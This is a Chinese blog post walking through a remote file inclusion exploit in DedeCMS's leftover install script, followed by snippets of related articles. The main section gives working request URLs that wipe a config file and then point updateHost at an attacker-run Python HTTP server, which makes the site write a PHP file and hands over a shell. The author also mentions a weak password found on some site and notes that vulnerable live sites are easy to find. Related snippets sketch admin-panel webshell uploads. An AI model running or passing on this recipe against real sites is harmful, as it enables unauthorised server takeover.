Web渗透学习-织梦CMS-RFI

最新推荐文章于 2024-05-02 04:10:46 发布
最新推荐文章于 2024-05-02 04:10:46 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 技术杂项
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Garfy_/article/details/46817361
版权

今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI(远程文件包含)。

织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。

大致可以分为三步:


1.清空/data/config_update.php中的信息。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

2.自己开一台服务器,假设是192.168.3.162,在服务器中写一个简单的脚本(但是不能保存成php类型)。

$ifconfig en0
$mkdir "dedecms"
$cd dedecms
$echo "<?php phpinfo();?>" > demodata.a.txt
$python -m SimpleHTTPServer


3.获取shell。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://192.168.3.162:8000/


接下来可以验证一下,访问hello.php就好。 

http://127.0.0.1/install/hello.php




漏洞原理不难,但是想发现还是不容易的。而且这个漏洞仅限于一般用户(因为install属于安装后可以删除的文件夹),但是在实际找的时候还是发现很多网站没有删除。

还没有找真正的网站去试,不过却偶然发现了一个弱口令,希望能获得一枚乌云账号吧~

---------------------------

更新:这个漏洞还是很好找网站的~随便那么一找就找到啦

GarD0u
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
120.网络安全渗透测试—[CMS后台 getwebshell]—[dedecms5.7后台 getwebshell]
qwsn
07-10 2790
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上传文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
渗透测试-地基篇-Webshell-dedecms框架(八)
qq_34801745的博客
11-25 1519
** 渗透测试-地基篇-Webshell-dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
渗透学习-23- WEB 攻防-Python 考点&amp;CTF 与 CMS-SSTI 模版注入&amp;PYC 反编译
最新发布
2301_76268112的博客
05-02 34
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相关的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了很显然,并不是,所以这里就体现了我们模板引擎的作用,它可以根据从数据库中实时提取出来的数据对html页面实时的渲染,这,就是模板引擎。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,
记一次cms渗透测试
weixin_30776545的博客
08-08 1132
记一次cms渗透测试 0x01 前言 本次测试的整个流程:枚举用户名 - 针对性暴破 - 登录后台 - 后台编辑php文件getshell。 0x02 过程 1、登录功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名 2、登录功能模块无验证码,通过枚举出的用户名暴力破解出相应密码。并登录后台(dedecms v57) 3、开始遇到坑了。...
cms网站安全防护设置
火狼网络
10-18 1239
总所周知系统是目前开源CMS系统中,使用人数最多的系统之一,所以也被黑客们盯上了,官方对于系统的更新速度也比较慢,所以大家只能自己做好防范工作,这样才能更好的确保网站的安全性。 一:尽量不要使用香港、国外等虚拟空间。 这类虚拟空间,安全性非常低,几百甚至几千个用户的网站都放在一台服务器上,一旦其中的某个网站被攻击,正好他也是系统,那么你的完整就很容易被连带攻击。大家想一下,为什么你
搭网站-漏洞复现+漏洞影响范围
Woolemon的博客
11-01 1326
简介 内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 漏洞复现环境 PHP 5.6 Apache 2.4.39 MySQL 5.7 DeDeCMS V5.7 SP2正式版(2018-
教育科研-学习工具-SCART端口接地装置及具有此接地装置的机顶盒.zip
08-13
良好的接地可以降低信号失真,防止电磁干扰(EMI)和射频干扰(RFI)对视频信号的影响。在SCART连接中,如果接地不充分,可能会导致图像闪烁、颜色失真或其他图像质量问题。 机顶盒作为接收和处理电视信号的设备,...
Web-安全渗透全套教程文件包含漏.zip
05-22
【标题】:“Web-安全渗透全套教程文件包含漏洞”指的是一个关于网络安全的教程,特别是针对Web应用程序的安全渗透测试。在Web开发中,"文件包含漏洞"是一个常见的安全问题,它允许攻击者通过注入恶意代码来控制或...
rfi-webgl-client:用于RFI的WebGL客户端
05-13
RFI:前体客户端 这是RFI的WebGL客户端:前体MMORPG。 这是一项实验性的尝试,试图了解MMO客户在纯网络技术中的可行性。 当前状态 现在,它可以执行与服务器的登录,四处移动以及共享状态。 这是网络的视频: ...
HDMI-Cable-设计规范.pdf
07-14
3. **屏蔽层**:为了减少电磁干扰(EMI)和射频干扰(RFI),HDMI线需要有良好的屏蔽层,通常包括铝箔和金属编网。编屏蔽覆盖率应达到一定标准,确保信号的纯净。 4. **连接器**:HDMI线两端的连接器,即HDMI...
2 - RFI system level test procedureRev1.3.zip
10-01
《RFI系统级测试流程详解》 在无线通信领域,RFI(Radio Frequency Interference,射频干扰)是一项至关重要的考量因素。RFI系统级测试是确保设备在真实环境中能够正常运行、避免信号干扰的关键步骤。本文将深入...
Dedecms的另类渗透
qq_40162181的博客
07-17 356
Dedecms的另类渗透前言背景第一步:网站信息收集 前言 这个案子完成已有一段时间,早该总结的,先自我批评一下。之所以说是“另类渗透”,严格来说这次渗透是没有成功的,服务器的权限没有拿到,但是拿到了想要的数据。 背景 要获取一个Dedecms 网站的数据,网站后台:未知,账号、密码未知。 第一步:网站信息收集 这位大神这篇帖子讲渗透讲得很好,附上链接:https://blog.csdn.net/qq_36119192/article/details/84674109 对一个cms(内容分发网站),首先要判
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 5535
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
m0_65336233的博客
10-17 1331
WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计
渗透测试专题之decms的攻防篇(一)
weixin_34185320的博客
08-03 220
http://blog.sina.com.cn/s/blog_e981cdea0101c4jc.html 这个网站上介绍了网站攻防的几种技巧:下面我用自己的方式阐述一遍 -----------------------------攻击篇------------------------------------------------------ 1、cms的有关指纹信息的获取 a、访问...
CMS 管理员密码加解密
柴钰棋的博客
07-08 947
我在给朋友上网站的时候,有备份的数据,然后恢复就可以了。但是忘了一件大事,没有修改管理员密码。我勒个去,备份数据里的密码不是常用密码,也不是admin。后来在一篇博客里看到了解决办法。DEDECMS的密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码;方法是:前减3后减1,得到16位MD5。在数据库里查到的密码为:4f5358762b911dd95fdd去三减一得到16位md5码:35...
文件包含漏洞(RFI)
diecai2192的博客
04-24 970
1文件包含漏洞简介 include require include_once require_once RFI综述 RFI是Remote File Inclusion的英文缩写,直译过来就是远程文件包含,文件包含的目的是:程序员编写程序时,经常会把需要重复使用的代码写入一个单独的文件中,当需要调用这些代码时,再在其他文件中包含调用代码的文件。 一下是一个扫描端口PHP,可...
简单使用
weixin_30906701的博客
10-18 119
简单使用 现在老板要求你做一个文章管理系统,栏目(类别)包括(武侠、爱情、音乐...) ,每个栏目(类别)有对应的文章,文章已经给你准备好了,请你在30分钟搞定该网站,怎么样? 步骤: 1、登录到dedecms后台创建了三个栏目(类别) 后台->核心->网站栏目管理->添加顶级栏目 添加三个,刷新首页即可看看. 2、给每个栏目添加对应的文章给武...
DedeCms勾子技术
zc2087的专栏
05-25 624
勾子技术DedeCms V5.3最大的改变之一,可能大家不大理解勾子这名称,说具体些,在DedeCms里有很多模板调用标签,实际上,这些标签是通过解析后,按不同名称和属性返回不同内容来替代的,在不使用模板引擎的情况下,一个函数调用就可以认为是勾子的一种体现,这也是一些论坛程序的做法,但这种做法始终需要在核心一些文件加入一些代码,即使是最简单的代码,对升级显然是有一定麻烦的,而DedeCms V5.
php简单后台模板_渗透测试入门 —— 真的很简单
weixin_34395361的博客
01-13 413
1.本题是渗透测试入门的一道基础题,虽然美其名曰“真的很简单”,但对于新手还是有一定挑战性的,实践并掌握本题中的所有知识点,对渗透测试的基本理解有很大帮助。此题的目标是对一个基于 CMS 的网站进行渗透测试,找到网站登录后台,继而入侵服务器找到存放 flag 的文件。从实验手册上,可看出其中还会涉及到简单的提权过程。题目链接:https://www.ichunqiu.com/battalion...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值